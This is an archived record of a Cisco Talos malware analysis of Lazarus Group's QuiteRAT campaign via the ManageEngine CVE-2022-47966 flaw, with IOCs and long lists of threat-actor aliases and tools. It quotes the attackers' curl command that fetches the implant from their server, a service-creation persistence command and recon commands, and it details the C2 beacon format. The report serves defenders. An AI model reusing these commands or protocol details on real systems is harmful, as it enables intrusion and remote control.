{ "id": "4b7d474f-d983-4b78-a760-7c5c48b93b92", "created_at": "2026-04-06T00:14:29.232636Z", "updated_at": "2026-04-10T03:38:20.098931Z", "deleted_at": null, "sha1_hash": "cdb7237a581b6e98420f4fa2b592af10298c1b23", "title": "Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 550858, "plain_text": "Lazarus Group exploits ManageEngine vulnerability to deploy\r\nQuiteRAT\r\nBy Asheer Malhotra\r\nPublished: 2023-08-24 · Archived: 2026-04-05 21:48:30 UTC\r\nThursday, August 24, 2023 08:02\r\nCisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone\r\ninfrastructure and healthcare entities in Europe and the United States. This is the third documented\r\ncampaign attributed to this actor in less than a year, with the actor reusing the same infrastructure\r\nthroughout these operations.\r\nIn this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-\r\n47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware\r\nthreat we track as “QuiteRAT.” Security researchers first discovered this implant in February, but little has\r\nbeen written on it since then.\r\nQuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its\r\nfile size is significantly smaller. Both implants are built on the Qt framework and include capabilities such\r\nas arbitrary command execution.\r\nLazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the\r\ncomplexity of the malware’s code, making human analysis more difficult compared to threats created using\r\nsimpler programming languages such as C/C++, DOT NET, etc. Furthermore, since Qt is rarely used in\r\nmalware development, machine learning and heuristic analysis detection against these types of threats are\r\nless reliable.\r\nLazarus Group compromises internet backbone infrastructure company in Europe\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 1 of 10\n\nIn early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider\r\nin Europe to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk\r\ninstance to gain initial access. The successful exploitation triggered the immediate download and execution of a\r\nmalicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to\r\nimmediately deploy the QuiteRAT binary from a malicious URL:\r\ncurl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\\users\\public\\notify[.]exe\r\nThe IP address 146[.]4[.]21[.]94 has been used by Lazarus since at least May 2022.\r\nA successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting\r\nin the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary\r\nsystem information to its command and control (C2) servers and then waits on the C2 to respond with either a\r\ncommand code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process.\r\nSome of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:\r\nCommand Intent\r\nC:\\windows\\system32\\cmd.exe /c systeminfo |\r\nfindstr Logon\r\nGet logon server name (machine name). System\r\nInformation Discovery [T1082]\r\nC:\\windows\\system32\\cmd.exe /c ipconfig |\r\nfindstr Suffix\r\nDomain name for the system. Domain discovery\r\n[T1087/002]\r\nThere is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by\r\nissuing the following command to QuiteRAT:\r\nC:\\Windows\\system32\\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto\r\nerror= ignore binpath= cmd /K start c:\\users\\public\\notify[.]exe\r\nA typical infection chain looks like this:\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 2 of 10\n\nLazarus Group evolves malicious arsenal with QuiteRAT\r\nQuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt\r\nlibraries along with some user-written code. The Qt framework is a platform for developing cross-platform\r\napplications. However, it is immensely popular for developing Graphical User Interface in applications. Although\r\nQuiteRAT, just like MagicRAT, uses embedded Qt libraries, none of these implants have a Graphical User\r\nInterface. .As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity,\r\nmaking human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less\r\nreliable, since Qt is rarely used in malware development.\r\nBased on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this\r\nimplant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s\r\nreport from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability\r\n(CVE-2022-47966) — which has a Kenna risk score of 100 out of 100 — to deploy QuiteRAT.\r\nThe implant initially gathers some rudimentary information about the infected endpoint, including MAC\r\naddresses, IP addresses, and the current user name of the device. This information is then arranged in the format:\r\n\u003cMAC_address\u003e\u003cIP_address\u003e[0];\u003cMAC_address\u003e\u003cIP_address\u003e[1];...\u003cMAC_address\u003e\u003cIP_address\u003e[n];\u003cusername\u003e\r\nThe resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim\r\nidentifier) while conversing with the C2 server.\r\nAll the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and\r\nstored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 3 of 10\n\nWithSecure’s analysis from earlier this year.\r\nConfiguration strings encoded in the malware.\r\nThe URL to communicate with the C2 is constructed as follows with the following extended URI parameters:\r\nParameter\r\nnames\r\nValues Description\r\nmailid \u003c12 chars from MD4\u003e\r\nThe first 12 characters from the MD4 of the information\r\ngathered from the endpoint (described earlier)\r\naction\r\n“inbox” = send check\r\nbeacon\r\n“sent” = data is being sent\r\nto C2\r\nSignifies the action being taken\r\nbody \u003cbase64_xorred_data\u003e Data to be sent to C2.\r\nparam\r\n\u003cInternal/Local IP\r\naddress\u003e\r\nThe internal/LAN IP address of the infected endpoint.\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 4 of 10\n\nParameter\r\nnames\r\nValues Description\r\nsession \u003crand\u003e Pseudo-random number generated by the implant.\r\nThe URL for the HTTP GET to obtain inputs from the C2 looks like this:\r\n\u003cC2_URL\u003e/mailid=\u003c12chars_MD4\u003e\u0026action=inbox\u0026param=\u003cInternal/Local_IP_address\u003e\u0026session=\u003crand\u003e\r\nData is also sent to the C2 using the HTTP GET VERB as well. The URL for the HTTP GET to send data to the\r\nC2 looks like this:\r\n\u003cC2_URL\u003e/mailid=\u003c12chars_MD4\u003e\u0026action=sent\u0026body=\u003cbase64_xorred_data\u003eparam=\r\n\u003cInternal/Local_IP_address\u003e\u0026session=\u003crand\u003e\r\nAny data sent to the C2 is utmost 0x400 (1,024) bytes in length. If the output of a command executed on the\r\nendpoint by the implant is larger than 1,024 bytes, the implant appends the \u003c No Pineapple! \u003e marker at the end\r\nof the data.\r\nThe User-Agent used during communications by the implant is\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\r\nThe malware also has the ability to run a ping command on a random IP address that it generates on the fly. The\r\nrequest is usually executed using the command \u003ccompspec_path\u003e\\cmd.exe /c \u003cIP_Address\u003e -n 18 \u0026 :\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 5 of 10\n\nPing command being constructed by the implant including the octets for a random IP.\r\nThe implant can also receive a command code “sendmail” along with a numeric value from the C2 server. This\r\nvalue is then used by the implant to Sleep for a specific period of time (in minutes) before it begins talking to the\r\nC2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of\r\ntime while ensuring continued access to the compromised enterprise network.\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 6 of 10\n\nThe implant also has the ability to receive a second URL from the current C2 server via the command code\r\nreceivemail . The implant will then reach out to the second URL to receive commands and payloads from the\r\nserver to execute on the infected system.\r\nWe have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at\r\nthis time, which is included in the IOCs section:\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 7 of 10\n\nQuiteRAT binary name Compile date\r\nnotify.exe (32bit) May 30, 2022\r\nacres.exe July 22, 2022\r\nacres.exe (64bit) July 25, 2022\r\nThe latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022.\r\nThis is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT,\r\nbeginning in May 2023 suggests the actor is changing tactics, opting for a smaller, more compact Qt-based\r\nimplant.\r\nQuiteRAT vs MagicRAT\r\nQuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging\r\naround 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size. This\r\nsubstantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into\r\nQuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while\r\nMagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks,\r\nQuiteRAT does not have a persistence capability and needs to be issued one by the C2 server to achieve continued\r\noperation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.\r\nThere are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from\r\nbeing built on the Qt framework, both implants consist of the same abilities, including running arbitrary\r\ncommands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an\r\nadditional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings\r\nautomatically. Additionally, both implants use similar functionality to allow them to remain dormant on the\r\nendpoint by specifying a sleep period for them by the C2 server.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 8 of 10\n\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nIOCs for this research can also be found at our Github repository here.\r\nHashes\r\nQuiteRAT\r\ned8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6\r\nNetworks IOCs\r\n146[.]4[.]21[.]94\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php\r\nhxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 9 of 10\n\nSource: https://blog.talosintelligence.com/lazarus-quiterat/\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://blog.talosintelligence.com/lazarus-quiterat/" ], "report_names": [ "lazarus-quiterat" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434469, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cdb7237a581b6e98420f4fa2b592af10298c1b23.pdf", "text": "https://archive.orkl.eu/cdb7237a581b6e98420f4fa2b592af10298c1b23.txt", "img": "https://archive.orkl.eu/cdb7237a581b6e98420f4fa2b592af10298c1b23.jpg" } }